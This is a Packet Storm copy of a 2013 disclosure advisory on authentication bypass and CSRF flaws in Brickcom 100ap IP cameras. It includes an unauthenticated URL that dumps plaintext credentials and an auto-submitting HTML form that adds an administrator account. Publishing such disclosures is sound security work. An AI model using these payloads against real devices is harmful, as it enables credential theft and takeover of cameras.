what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Brickcom 100ap Series Authentication Bypass / CSRF

Brickcom 100ap Series Authentication Bypass / CSRF
Posted Jun 13, 2013
Authored by Javier Repiso Sanchez, Eliezer Varad Lopez, Jonas Rapero Castillo

Brickcom 100ap Series IP cameras suffer from authentication bypass and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, bypass, csrf
advisories | CVE-2013-3689, CVE-2013-3690
SHA-256 | d7701a35ff508516595ba457e8080c4cc4d6d2153918179e97536a7ee0671226

Brickcom 100ap Series Authentication Bypass / CSRF

Change Mirror Download
============================================================================
BRICKCOM
====================================================================
============================================================================

1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
Multiples vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)

3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It’s possible others models are affected but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4
-CVE-2013-3690.
All firmware checked.

4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It’s not necessary any authentication.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________

The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***

4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method.
Also is possible a privilege escalation from a viewer user to an administrator user.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
The following request can exploit this vulnerability
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it’s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)
-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities.
-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close